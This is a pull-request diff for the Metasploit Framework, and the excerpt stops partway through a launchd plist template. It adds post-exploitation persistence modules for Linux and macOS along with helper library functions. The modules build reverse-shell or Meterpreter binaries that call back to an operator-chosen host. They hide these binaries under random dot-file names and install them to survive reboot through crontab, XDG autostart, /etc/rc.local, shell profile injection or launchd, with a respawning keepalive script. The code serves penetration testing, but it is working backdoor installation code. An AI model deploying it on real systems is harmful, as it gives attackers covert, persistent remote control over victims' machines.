### PR TITLE
Add persistence module for linux and osx

### DIFF
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -45,6 +45,8 @@ module Msf::Post::File
 		end
 	end
 
+	alias directory_exist? directory?
+
 	def expand_path(path)
 		if session.type == "meterpreter"
 			return session.fs.file.expand_path(path)

--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@@ -24,6 +24,15 @@ module Priv
 		return root_priv
 	end
 
+	def get_user_shell
+		cmd = %q{while IFS=":" read -r a b c d e f g
+		do 
+		  echo :$c:$f:$g
+		done < /etc/passwd | /bin/grep ":$(id -u):"}
+		shell = cmd_exec(cmd).split(':')[3].gsub("\n", '').scan(/[a-zA-Z0-9]*$/)[0]
+		shell
+	end
+
 end # Priv
 end # Linux
 end # Post

--- a/lib/msf/core/post/linux/system.rb
+++ b/lib/msf/core/post/linux/system.rb
@@ -95,6 +95,16 @@ module System
 		return system_data
 	end
 
+	def is_X_running?
+		#TODO: add XFree86 too
+		checkdir = cmd_exec('ps -A | grep Xorg | wc -l')
+		if checkdir == '0'
+			return false
+		else
+			return true
+		end
+	end
+
 
 end # System
 end #Linux

--- a/lib/msf/core/post/osx/priv.rb
+++ b/lib/msf/core/post/osx/priv.rb
@@ -1,0 +1,23 @@
+# -*- coding: binary -*-
+require 'msf/core/post/common'
+
+module Msf
+class Post
+module Osx
+module Priv
+	include ::Msf::Post::Common
+
+	# Returns true if running as root, false if not.
+	def is_root?
+		name = cmd_exec("whoami")
+		if name == 'root'
+			return true
+		else
+			return false
+		end
+	end
+
+end 
+end 
+end 
+end 

--- a/lib/msf/core/post/persistence.rb
+++ b/lib/msf/core/post/persistence.rb
@@ -1,0 +1,199 @@
+
+module Msf
+class Post
+module Persistence
+
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				OptAddress.new('LHOST', [true, 'IP for persistent payload to connect to.']),
+				OptInt.new('LPORT', [true, 'Port for persistent payload to connect to.']),
+				OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
+				OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
+				OptPath.new('TEMPLATE', [false, 'Alternate template Binary File to use.']),
+				OptPath.new('REXE',[false, 'Use an alternative on disk executable.','']),
+				OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
+				OptString.new('RBATCHNAME',[false, 'The name to call the batch on remote system (for keepalive)','']),
+				OptString.new('REXEPATH',[false, 'Use alternative path on remote system instead of home directory','']),
+				OptBool.new('EXECUTE', [true, 'Execute the binary file once uploaded.', false]),
+				OptBool.new('KEEPALIVE', [true, 'Respawn the shell upon disconection.' , true]),
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
+				OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
+				OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.'])
+			], self.class)
+
+	end
+
+	# Generate raw payload
+	#-------------------------------------------------------------------------------
+	def pay_gen(pay,encoder, iterations)
+		raw = pay.generate
+		if encoder
+			if enc_compat(pay, encoder)
+				print_status("Encoding with #{encoder}")
+				enc = framework.encoders.create(encoder)
+				(1..iterations).each do |i|
+					print_status("\tRunning iteration #{i}")
+					raw = enc.encode(raw, nil, nil, "Windows")
+				end
+			end
+		end
+		return raw
+	end
+
+	# Check if encoder specified is in the compatible ones
+	#
+	# Note: This should allow to adapt to new encoders if they appear with out having
+	# to have a static whitelist.
+	#-------------------------------------------------------------------------------
+	def enc_compat(payload, encoder)
+		compat = false
+		payload.compatible_encoders.each do |e|
+			if e[0] == encoder.strip
+				compat = true
+			end
+		end
+		return compat
+	end
+
+	# Create a payload given a name, lhost and lport, additional options
+	#-------------------------------------------------------------------------------
+	def create_payload(name, lhost, lport, opts = "")
+		pay = session.framework.payloads.create(name)
+		pay.datastore['LHOST'] = lhost
+		pay.datastore['LPORT'] = lport
+		if not opts.empty?
+			opts.split(",").each do |o|
+				opt,val = o.split("=", 2)
+				pay.datastore[opt] = val
+			end
+		end
+		# Validate the options for the module
+		pay.options.validate(pay.datastore)
+		return pay
+
+	end
+
+	def create_payload_from_file(exec)
+		print_status("Reading Payload from file #{exec}")
+		return ::IO.read(exec)
+	end
+
+	# Function for creating log folder and returning log path
+	#-------------------------------------------------------------------------------
+	def log_file(log_path = nil)
+		#Get hostname
+		host = session.sys.config.sysinfo["Computer"]
+
+		# Create Filename info to be appended to downloaded files
+		filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+		# Create a directory for the logs
+		if log_path
+			logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+		else
+			logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+		end
+
+		# Create the log directory
+		::FileUtils.mkdir_p(logs)
+
+		#logfile name
+		logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+		return logfile
+	end
+
+	# Function for writing executable to target host
+	#-------------------------------------------------------------------------------
+	def write_unix_bin_to_target(bin, rexename, isbash=false)
+		if @use_home_dir
+			bindir = get_home_dir()
+		else
+			bindir = ::File.expand_path(datastore['REXEPATH'])
+		end
+		binfile  = ::File.join(bindir, rexename)
+		write_file(binfile, bin)
+		# Check if file has been created
+		cmdfile = '[ -f "' +  binfile + '" ] && echo "OK" || echo "KO"'
+		checkfile = cmd_exec(cmdfile)
+		file_present =  checkfile == 'OK'
+		unless file_present
+			raise "File has not been created, maybe permission issue on the folder (#{bindir})"
+		end
+		cmd_exec("chmod +x #{binfile}")
+		if isbash
+			print_status("Bash File written to #{binfile}")
+		else
+			print_status("Binary File written to #{binfile}")
+		end
+		return binfile
+	end
+
+	# Method for checking if a listener for a given IP and port is present
+	# will return true if a conflict exists and false if none is found
+	#-------------------------------------------------------------------------------
+	def check_for_listner(lhost,lport)
+		conflict = false
+		client.framework.jobs.each do |k,j|
+			if j.name =~ / multi\/handler/
+				current_id = j.jid
+				current_lhost = j.ctx[0].datastore["LHOST"]
+				current_lport = j.ctx[0].datastore["LPORT"]
+				if lhost == current_lhost and lport == current_lport.to_i
+					print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
+					conflict = true
+				end
+			end
+		end
+		return conflict
+	end
+
+	# Starts a multi/handler session
+	#-------------------------------------------------------------------------------
+	def create_multihand(payload,lhost,lport)
+		pay = session.framework.payloads.create(payload)
+		pay.datastore['LHOST'] = lhost
+		pay.datastore['LPORT'] = lport
+		print_status("Starting exploit multi handler")
+		if not check_for_listner(lhost,lport)
+			# Set options for module
+			mul = session.framework.exploits.create("multi/handler")
+			mul.share_datastore(pay.datastore)
+			mul.datastore['WORKSPACE'] = client.workspace
+			mul.datastore['PAYLOAD'] = payload
+			mul.datastore['EXITFUNC'] = 'thread'
+			mul.datastore['ExitOnSession'] = false
+			# Validate module options
+			mul.options.validate(mul.datastore)
+			# Execute showing output
+			mul.exploit_simple(
+					'Payload'     => mul.datastore['PAYLOAD'],
+					'LocalInput'  => self.user_input,
+					'LocalOutput' => self.user_output,
+					'RunAsJob'    => true
+				)
+		else
+			print_error("Could not start handler!")
+			print_error("A job is listening on the same Port")
+		end
+
+	end
+
+	# Function to execute script on target 
+	#-------------------------------------------------------------------------------
+	def target_shell_exec(bin_on_target)
+		print_status("Executing binary file #{bin_on_target}")
+		cmd_exec(bin_on_target)
+		return 
+	end
+
+end
+end
+end
+

--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -76,6 +76,65 @@ module Unix
 		user_dirs
 	end
 
+	# Function to get the home directory
+	#-------------------------------------------------------------------------------
+	def get_home_dir()
+		case session.platform
+		when 'solaris'
+			user_id = cmd_exec("/usr/xpg4/bin/id -u")
+
+			cmd = 'cat /etc/passwd | grep ":' + user_id.gsub(' ','') + ':"'
+			homedir = cmd_exec(cmd).split(":")[5]
+		when 'osx'
+			name = cmd_exec("whoami")
+			if name == 'root'
+				homedir = '/'
+			else
+				homedir = ::File.join("/Users", name)
+			end
+		when  'bsd'
+			cmd = %q{while IFS=":" read -r a b c d e f g
+				do 
+				  echo :$c:$f
+				done < /etc/passwd | /usr/bin/grep ":$(id -u):"}
+				homedir = cmd_exec(cmd).split(":")[2].gsub("\n", "")
+		when 'linux'
+			cmd = %q{while IFS=":" read -r a b c d e f g
+				do 
+				  echo :$c:$f
+				done < /etc/passwd | /bin/grep ":$(id -u):"}
+				homedir = cmd_exec(cmd).split(":")[2].gsub("\n", "")
+		end
+		raise "Error while requesting home dir" unless homedir =~ /^\/[A-Za-z0-9_\-\/]*$/
+		return homedir
+	end
+
+	def get_arch
+		arch = cmd_exec("uname -m")
+		case arch
+		when /x86_64/
+			return "x64"
+		when /(i[3-6]86)|(i86pc)/
+			return "x86"
+		else
+			return arch
+		end		
+	end
+
+	def dir_exists? dir
+		dir = ::File.expand_path(dir)
+		cmddir = '[ -d "' +  dir + '" ] && echo "OK" || echo "KO"'
+		checkdir = cmd_exec(cmddir)
+		return checkdir == 'OK'
+	end
+
+	def file_exists? file
+		dir = ::File.expand_path(file)
+		cmdfile = '[ -f "' +  file + '" ] && echo "OK" || echo "KO"'
+		checkfile = cmd_exec(cmdfile)
+		return checkfile == 'OK'
+	end
+
 end
 end
 end

--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -121,20 +121,6 @@ module Unix
 		end		
 	end
 
-	def dir_exists? dir
-		dir = ::File.expand_path(dir)
-		cmddir = '[ -d "' +  dir + '" ] && echo "OK" || echo "KO"'
-		checkdir = cmd_exec(cmddir)
-		return checkdir == 'OK'
-	end
-
-	def file_exists? file
-		dir = ::File.expand_path(file)
-		cmdfile = '[ -f "' +  file + '" ] && echo "OK" || echo "KO"'
-		checkfile = cmd_exec(cmdfile)
-		return checkfile == 'OK'
-	end
-
 end
 end
 end

--- a/modules/post/linux/manage/persistence.rb
+++ b/modules/post/linux/manage/persistence.rb
@@ -267,11 +267,7 @@ class Metasploit3 < Msf::Post
 				print_error("Only root user is allowded for this startup type")
 				return false
 			end
-			runlevel = cmd_exec('runlevel').scan(/[0-9]*$/)[0].gsub("\n", '')
-			rc_dir = "/etc/rc#{runlevel}.d"
-			unless directory_exist? rc_dir
-				print_error("The rc directory does not exists : #{rc_dir}")
-			end
+
 			rc_temp = '/etc/rc.local' + ::Rex::Text.rand_text_alpha((rand(4)+6))
 			cmd_exec('cp /etc/rc.local ' + rc_temp)
 			cmd_exec('echo "#!/bin/sh" > /etc/rc.local' )

--- a/modules/post/linux/manage/persistence.rb
+++ b/modules/post/linux/manage/persistence.rb
@@ -1,0 +1,332 @@
+# $Id: checkvm.rb 14812 2012-02-26 08:11:04Z rapid7 $
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+require 'msf/core/post/persistence'
+require 'msf/core/post/linux/priv'
+require 'msf/core/post/linux/system'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Unix
+	include Msf::Post::Persistence
+	include Msf::Post::Linux::Priv
+	include Msf::Post::Linux::System
+
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Manage Persistent Payload Installer for linux',
+			'Description'   => %q{
+				This Module will create a boot persistent reverse Meterpreter or Shell session by
+				installing on the target host the payload that will be executed
+				at system startup through one of the following 4 methods. 1) By using crontab subsystem,
+				this is the recomended method. 2) Through Autostart feature as described by freedesktop.org.
+				3) By adding an entry in the rc.local launched by init. 4) By adding an entry
+				 in the user shell profile file. 
+
+				REXE mode will transfer a binary of your choosing to remote host to be
+				used as a payload.
+				KEEPALIVE is done through a bash script
+				},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'Alexandre Maloteaux <alex_maloteaux[at]metasploit.com>'],
+					#based on the windows persistence post module
+			'Version'       => '$Revision: 14812 $',
+			'Platform'      => [ 'linux'],
+			'SessionTypes'  => [ 'shell' ] #meterpreter sessions need "Bug #6825 : Creating a second tcp channel fails" to be resolved
+			))
+
+		register_options(
+			[
+				OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter or Shell. (Meterpreter works only on linux x86)', 'SHELL',['SHELL','METERPRETER']]),
+				OptEnum.new('STARTUP_TYPE', [true, 'crontab, autostart or init file .', 'CRONTAB',['CRONTAB','AUTOSTART','INIT','PROFILE']]),
+			], self.class)
+
+	end
+
+
+	def run
+
+		rexe = datastore['REXE']
+		@rexename = datastore['REXENAME'] 
+		@rexename = ".tmp_" + ::Rex::Text.rand_text_alpha((rand(4)+6)) if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
+		
+		@lhost = datastore['LHOST']
+		@lport = datastore['LPORT']
+		opts = datastore['OPTIONS']
+		encoder = datastore['ENCODER']
+		iterations = datastore['ITERATIONS']
+		@host,@port = session.session_host, session.session_port
+
+		@arch = ''
+		@homedir = get_home_dir()
+		@use_home_dir = true
+		@startup_type = datastore['STARTUP_TYPE']
+		@is_root = false
+
+		@mode = 'payload'
+		bin = ''
+
+		return unless check_arch
+
+		unless datastore['ENCODER'].nil? or datastore['ENCODER'].empty?
+			print_error("Warning : Using an encoder is not recommended on this platform, test carefully first")
+		end
+
+		unless datastore['TEMPLATE'].nil? or datastore['TEMPLATE'].empty?
+			print_error("Warning : Using a template is not recommended on this platform, test carefully first")
+		end
+
+		unless datastore['REXEPATH'].nil? or datastore['REXEPATH'].empty?
+			@use_home_dir = false;
+			rexepath = ::File.expand_path(datastore['REXEPATH'])
+			if not dir_exists? rexepath
+				print_error("The directory #{datastore['REXEPATH']} does not exists on the remote system")
+				return
+			end
+		end
+
+		if is_root?
+			@is_root = true
+			print_status("root session detected")
+		end
+
+		unless datastore['REXE'].nil? or datastore['REXE'].empty?
+			@mode = 'rexe'
+			if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
+				print_error("Please define REXENAME")
+				return
+			end
+
+			if not ::File.exist?(datastore['REXE'])
+				print_error("Rexe file does not exist!")
+				return
+			end
+
+			bin = create_payload_from_file(rexe)
+		else
+			# Check that if a template is provided that it actually exists
+			if datastore['TEMPLATE']
+				if not ::File.exists?(datastore['TEMPLATE'])
+					print_error "Template File does not exists!"
+					return
+				else
+					template_bin = datastore['TEMPLATE']
+				end
+			end
+
+			if datastore['PAYLOAD_TYPE'] == 'SHELL'
+				payload = "linux/#{@arch}/shell/reverse_tcp"
+			else #meterpreter
+				if @arch == 'x64'
+					print_error("Meterpreter payload are not suported on x64 platform")
+					return
+				end
+				payload = "linux/x86/meterpreter/reverse_tcp"
+			end
+			
+			# Create payload and bin
+			print_status("Payload type : #{payload}")
+			pay = create_payload(payload, @lhost, @lport, opts = "")
+			return if not pay # payload not implemented
+			raw = pay_gen(pay,encoder, iterations)
+			bin = create_bin(template_bin, raw)
+		end
+
+		binpath = write_unix_bin_to_target(bin, @rexename)
+
+		unless make_persistent(binpath)
+			return 
+		end
+
+		# Start handler if set
+		if @mode == 'payload'
+			create_multihand(payload, @lhost, @lport) if datastore['HANDLER']
+		else
+			print_error("Handler won't be started in this mode") if datastore['HANDLER'] == true
+		end
+
+		# Initial execution of bin file
+		if datastore['EXECUTE']
+			target_shell_exec(binpath) 
+		end
+		return
+	end
+
+
+
+	# Function for Creating persistent Bin
+	#-------------------------------------------------------------------------------
+	def create_bin(altbin, raw)
+
+		if not altbin.nil?
+			bin = eval( "::Msf::Util::EXE.to_linux_#{@arch}_elf(session.framework, raw, {:template => altbin})")
+		else
+			bin = eval( "::Msf::Util::EXE.to_linux_#{@arch}_elf(session.framework, raw, {})")
+		end
+		print_status("Persistent agent file is #{bin.length} bytes long")
+		return bin
+	end
+
+
+	# Function to make the binary file persistent
+	# Warning : on some system like OEL crontab may not be in PATH 
+	#-------------------------------------------------------------------------------
+	def make_persistent(binpath)
+		if datastore['KEEPALIVE'] and @mode == 'payload'
+			if datastore['RBATCHNAME'].nil? or datastore['RBATCHNAME'].empty?
+				batchfilename = '.tmp_' + ::Rex::Text.rand_text_alpha((rand(4)+6)) 
+			else
+				batchfilename = datastore['RBATCHNAME']
+			end
+			# Another way then netstat would be to use $! and grep on the pid ...
+			bashscript = %Q|#!/bin/sh
+			while true; do 
+			if /bin/netstat -etn \| /bin/egrep  "(.)*#{@lhost}:#{@lport} (.)*" >/dev/null 
+			then
+				sleep #{datastore['DELAY']}
+			else
+				#{binpath}&
+				sleep #{datastore['DELAY']}
+			fi
+			done
+			|	
+			bashscript.gsub!(/^\t\t\t/, '')
+			bashscriptpath = write_unix_bin_to_target(bashscript, batchfilename, true)
+			path_for_file = bashscriptpath
+		else
+			path_for_file = binpath
+		end
+
+		case @startup_type
+		when 'CRONTAB'
+			cmd_exec('crontab -l | { cat; echo "@reboot ' + path_for_file + '"; }  | crontab - ')
+			print_status("Cron job added upon reboot")
+
+		when 'AUTOSTART'
+			unless is_X_running?
+				print_error("It looks like there is no X server running")
+				return false
+			end
+
+			# TODO : (really not common , tested on Debian , OEL 5.5 , Ubuntu ) 
+			# Upon Desktop Application Autostart Specification (http://standards.freedesktop.org/autostart-spec/autostart-spec-latest.html)
+			# If $XDG_CONFIG_HOME is not set the Autostart Directory in the user's home directory is ~/.config/autostart/
+			# If $XDG_CONFIG_DIRS is not set the system wide Autostart Directory is /etc/xdg/autostart/
+			# If $XDG_CONFIG_HOME and $XDG_CONFIG_DIRS are not set and the two files /etc/xdg/autostart/foo.desktop and ~/.config/autostart/foo.desktop exist then only the 			# file ~/.config/autostart/foo.desktop will be used because ~/.config/autostart/ is more important than /etc/xdg/autostart/ 
+			if @is_root
+				autostart_path = '/etc/xdg/autostart/'
+				unless dir_exists? autostart_path
+					print_error("xdg path do not exists : #{autostart_path}")
+					return false
+				end
+				#This is mandatory cause file in /root won't be launched
+				if datastore['REXEPATH'].nil? or datastore['REXEPATH'].empty?
+					old_path_for_file = path_for_file
+					path_for_file = '/usr/lib/' + @rexename
+					cmd_exec('mv ' + old_path_for_file + ' ' + path_for_file )
+					print_status("This mode require the file to be moved outside of /root ( from #{old_path_for_file} to #{path_for_file})")
+				end
+
+			else
+				autostart_path = ::File.join(@homedir, '.config', 'autostart')
+				#some distribution like OEL do not create it by default
+				unless dir_exists? autostart_path
+					cmd_exec('mkdir -p ' + autostart_path)
+				end
+			end
+			autostart_file = ::File.join(autostart_path, ::Rex::Text.rand_text_alpha((rand(4)+6)) + '.desktop' )
+			desktop_file = %Q|
+			[Desktop Entry]
+			Name=#{::Rex::Text.rand_text_alpha((rand(4)+6))}
+			Exec=#{path_for_file}
+			Terminal=false
+			Type=Application
+			NoDisplay=true
+			|
+			desktop_file.gsub!(/^\t\t\t/, '')
+			write_file(autostart_file, desktop_file)
+			print_status("Autostart desktop file added : #{autostart_file}")
+
+		when 'INIT'
+			unless @is_root
+				print_error("Only root user is allowded for this startup type")
+				return false
+			end
+			runlevel = cmd_exec('runlevel').scan(/[0-9]*$/)[0].gsub("\n", '')
+			rc_dir = "/etc/rc#{runlevel}.d"
+			unless dir_exists? rc_dir
+				print_error("The rc directory does not exists : #{rc_dir}")
+			end
+			rc_temp = '/etc/rc.local' + ::Rex::Text.rand_text_alpha((rand(4)+6))
+			cmd_exec('cp /etc/rc.local ' + rc_temp)
+			cmd_exec('echo "#!/bin/sh" > /etc/rc.local' )
+			cmd_exec('echo "' + path_for_file + '&" >> /etc/rc.local' )
+			cmd_exec('cat  ' + rc_temp + ' >> /etc/rc.local' )
+			cmd_exec('rm  ' + rc_temp  )
+			print_status("Entry added in /etc/rc.local")
+
+		when 'PROFILE'
+			shell = get_user_shell
+			print_status("User shell is #{shell}")
+
+			profile_file = ::File.join(@homedir, '.profile')
+			profile_file_temp = ::File.join(@homedir, '.profile') + ::Rex::Text.rand_text_alpha((rand(4)+6)) 
+			case shell 
+			when  'bash'
+				# login shell won't call bashrc must most distribution will call it from .profile or .bash_profile
+				# (gdm login will call .profile but .bashrc won't be called due to some internal check in .profile (Debian))
+				profile_file = ::File.join(@homedir, '.bashrc')
+			when  'zsh'
+				#read at beginning of execution by each shell (login or interactive)
+				profile_file = ::File.join(@homedir, '.zshrc')
+			when  'csh'
+				#read at beginning of execution by each shell (login or interactive)
+				profile_file = ::File.join(@homedir, '.cshrc')
+			when /(^sh$)|(^ksh$)/
+				# only interactive shell upon man page but looks like login shell use it too (Debian)
+				profile_file = ::File.join(@homedir, '.kshrc')
+			when 'sh'
+				profile_file = ::File.join(@homedir, '.profile')
+			else
+				print_error("This shell has not been tested with this module")
+				profile_file = ::File.join(@homedir, '.profile')
+			end
+			if file_exists? profile_file
+				cmd = 'cat ' + profile_file + ' | { echo "' + path_for_file + '&"; cat; } | cat > ' + profile_file_temp
+				cmd_exec(cmd)
+				cmd_exec('mv ' + profile_file_temp + ' ' + profile_file)
+			else
+				cmd = 'echo "' + path_for_file + '&" > ' + profile_file
+				cmd_exec(cmd)
+			end
+			print_status("Payload path injected inside #{profile_file}")
+		end
+		true
+	end
+
+	def check_arch
+		@arch = get_arch
+		unless @arch == 'x86' or @arch == 'x64'
+			print_error("This architecture is not suported with this module (#{@arch})")
+			return false
+		end
+		return true
+	end
+
+end
+

--- a/modules/post/linux/manage/persistence.rb
+++ b/modules/post/linux/manage/persistence.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post
 		unless datastore['REXEPATH'].nil? or datastore['REXEPATH'].empty?
 			@use_home_dir = false;
 			rexepath = ::File.expand_path(datastore['REXEPATH'])
-			if not dir_exists? rexepath
+			if not directory_exist? rexepath
 				print_error("The directory #{datastore['REXEPATH']} does not exists on the remote system")
 				return
 			end
@@ -230,7 +230,7 @@ class Metasploit3 < Msf::Post
 			# If $XDG_CONFIG_HOME and $XDG_CONFIG_DIRS are not set and the two files /etc/xdg/autostart/foo.desktop and ~/.config/autostart/foo.desktop exist then only the 			# file ~/.config/autostart/foo.desktop will be used because ~/.config/autostart/ is more important than /etc/xdg/autostart/ 
 			if @is_root
 				autostart_path = '/etc/xdg/autostart/'
-				unless dir_exists? autostart_path
+				unless directory_exist? autostart_path
 					print_error("xdg path do not exists : #{autostart_path}")
 					return false
 				end
@@ -245,7 +245,7 @@ class Metasploit3 < Msf::Post
 			else
 				autostart_path = ::File.join(@homedir, '.config', 'autostart')
 				#some distribution like OEL do not create it by default
-				unless dir_exists? autostart_path
+				unless directory_exist? autostart_path
 					cmd_exec('mkdir -p ' + autostart_path)
 				end
 			end
@@ -269,7 +269,7 @@ class Metasploit3 < Msf::Post
 			end
 			runlevel = cmd_exec('runlevel').scan(/[0-9]*$/)[0].gsub("\n", '')
 			rc_dir = "/etc/rc#{runlevel}.d"
-			unless dir_exists? rc_dir
+			unless directory_exist? rc_dir
 				print_error("The rc directory does not exists : #{rc_dir}")
 			end
 			rc_temp = '/etc/rc.local' + ::Rex::Text.rand_text_alpha((rand(4)+6))
@@ -306,7 +306,7 @@ class Metasploit3 < Msf::Post
 				print_error("This shell has not been tested with this module")
 				profile_file = ::File.join(@homedir, '.profile')
 			end
-			if file_exists? profile_file
+			if file_exist? profile_file
 				cmd = 'cat ' + profile_file + ' | { echo "' + path_for_file + '&"; cat; } | cat > ' + profile_file_temp
 				cmd_exec(cmd)
 				cmd_exec('mv ' + profile_file_temp + ' ' + profile_file)

--- a/modules/post/osx/manage/persistence.rb
+++ b/modules/post/osx/manage/persistence.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
 		unless datastore['REXEPATH'].nil? or datastore['REXEPATH'].empty?
 			@use_home_dir = false;
 			rexepath = ::File.expand_path(datastore['REXEPATH'])
-			if not dir_exists? rexepath
+			if not directory_exist? rexepath
 				print_error("The directory #{datastore['REXEPATH']} does not exists on the remote system")
 				return
 			end
@@ -206,7 +206,7 @@ class Metasploit3 < Msf::Post
 			agentsdir = ::File.join(@homedir, "/Library/LaunchAgents")
 			plistfile = ::File.join(agentsdir, plistname)
 			#Not created upon install
-			unless dir_exists? agentsdir
+			unless directory_exist? agentsdir
 				cmd_exec('mkdir -p ' + agentsdir)
 			end
 			write_file(plistfile, plist)

--- a/modules/post/osx/manage/persistence.rb
+++ b/modules/post/osx/manage/persistence.rb
@@ -1,0 +1,228 @@
+# $Id: checkvm.rb 14812 2012-02-26 08:11:04Z rapid7 $
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+require 'msf/core/post/persistence'
+require 'msf/core/post/osx/priv'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Unix
+	include Msf::Post::Persistence
+	include Msf::Post::Osx::Priv
+
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Manage Persistent Payload Installer for osx platform',
+			'Description'   => %q{
+				This Module will create a boot persistent reverse Shell session by
+				installing on the target host the payload that will be executed
+				at system startup through launchd.
+
+				REXE mode will transfer a binary of your choosing to remote host to be
+				used as a payload.
+				},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'Alexandre Maloteaux <alex_maloteaux[at]metasploit.com>'],
+			'Version'       => '$Revision: 14812 $',
+			'Platform'      => [ 'osx' ],
+			'SessionTypes'  => [ 'shell' ] 
+			))
+
+		register_options(
+			[
+				OptString.new('PLISTNAME',[false, 'The name to call the plist on remote system (org.name.plist)','']),
+			], self.class)
+
+		deregister_options('DELAY', 'RBATCHNAME')
+
+	end
+
+
+	def run
+
+		# Set vars
+		rexe = datastore['REXE']
+		rexename = datastore['REXENAME'] 
+		rexename = ".tmp_" + ::Rex::Text.rand_text_alpha((rand(4)+6)) if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
+		
+		@lhost = datastore['LHOST']
+		@lport = datastore['LPORT']
+		opts = datastore['OPTIONS']
+		encoder = datastore['ENCODER']
+		iterations = datastore['ITERATIONS']
+		@host,@port = session.session_host, session.session_port
+
+		@homedir = get_home_dir()
+		@use_home_dir = true
+		@force_no_execute = false 
+
+		mode = 'payload'
+		bin = ''
+
+		return unless check_arch
+
+		unless datastore['ENCODER'].nil? or datastore['ENCODER'].empty?
+			print_error("Warning : Using an encoder is not recommended on this platform, test carefully first")
+		end
+
+		unless datastore['TEMPLATE'].nil? or datastore['TEMPLATE'].empty?
+			print_error("Warning : Using a template is not recommended on this platform, test carefully first")
+		end
+
+		unless datastore['REXEPATH'].nil? or datastore['REXEPATH'].empty?
+			@use_home_dir = false;
+			rexepath = ::File.expand_path(datastore['REXEPATH'])
+			if not dir_exists? rexepath
+				print_error("The directory #{datastore['REXEPATH']} does not exists on the remote system")
+				return
+			end
+		end
+
+		if is_root?
+			print_status("root session detected")
+		end
+
+		unless datastore['REXE'].nil? or datastore['REXE'].empty?
+			mode = 'rexe'
+			if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
+				print_error("Please define REXENAME")
+				return
+			end
+
+			if not ::File.exist?(datastore['REXE'])
+				print_error("Rexe file does not exist!")
+				return
+			end
+
+			bin = create_payload_from_file(rexe)
+		else
+			# Check that if a template is provided that it actually exists
+			if datastore['TEMPLATE']
+				if not ::File.exists?(datastore['TEMPLATE'])
+					print_error "Template File does not exists!"
+					return
+				else
+					template_bin = datastore['TEMPLATE']
+				end
+			end
+
+			payload = "osx/x86/shell_reverse_tcp"
+			
+			# Create payload and bin
+			print_status("Payload type : #{payload}")
+			pay = create_payload(payload, @lhost, @lport, opts = "")
+			return if not pay # payload not implemented
+			raw = pay_gen(pay,encoder, iterations)
+			bin = create_bin(template_bin, raw)
+		end
+
+		binpath = write_unix_bin_to_target(bin, rexename)
+		make_persistent(binpath)
+
+		# Start handler if set
+		if mode == 'payload'
+			create_multihand(payload, @lhost, @lport) if datastore['HANDLER']
+		else
+			print_error("Handler won't be started in this mode") if datastore['HANDLER'] == true
+		end
+
+		# Initial execution of bin file
+		#@force_no_execute : osx in root mode will always launch the file in the launctl command, @force_no_execute prevent from lanching it twice
+		if datastore['EXECUTE']
+			target_shell_exec(binpath)  if @force_no_execute == false
+		end
+	end
+
+
+	# Function for Creating persistent Bin
+	#-------------------------------------------------------------------------------
+	def create_bin(altbin, raw)
+		if not altbin.nil?
+			bin = ::Msf::Util::EXE.to_osx_x86_macho(session.framework, raw, {:template => altbin})
+		else
+			bin = ::Msf::Util::EXE.to_osx_x86_macho(session.framework, raw, {})
+		end
+		print_status("Persistent agent file is #{bin.length} bytes long")
+		return bin
+	end
+
+
+	# Function to make the binary file persistent
+	# Warning : on some system like OEL crontab may not be in PATH 
+	#-------------------------------------------------------------------------------
+	def make_persistent(binpath)
+
+		#launchctl
+		if datastore['PLISTNAME'].nil? or datastore['PLISTNAME'].empty?
+			plistname = 'org.' + ::Rex::Text.rand_text_alpha((rand(4)+6)) + '.plist'
+		else
+			plistname = 'org.' + datastore['PLISTNAME'] + '.plist'
+		end
+		if datastore['KEEPALIVE']
+			keepalive = '<true/>'
+		else
+			keepalive = '<false/>'
+		end
+		plist = %Q|<?xml version="1.0" encoding="UTF-8"?>
+		<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+		<plist version="1.0">
+		<dict>
+			<key>Label</key>
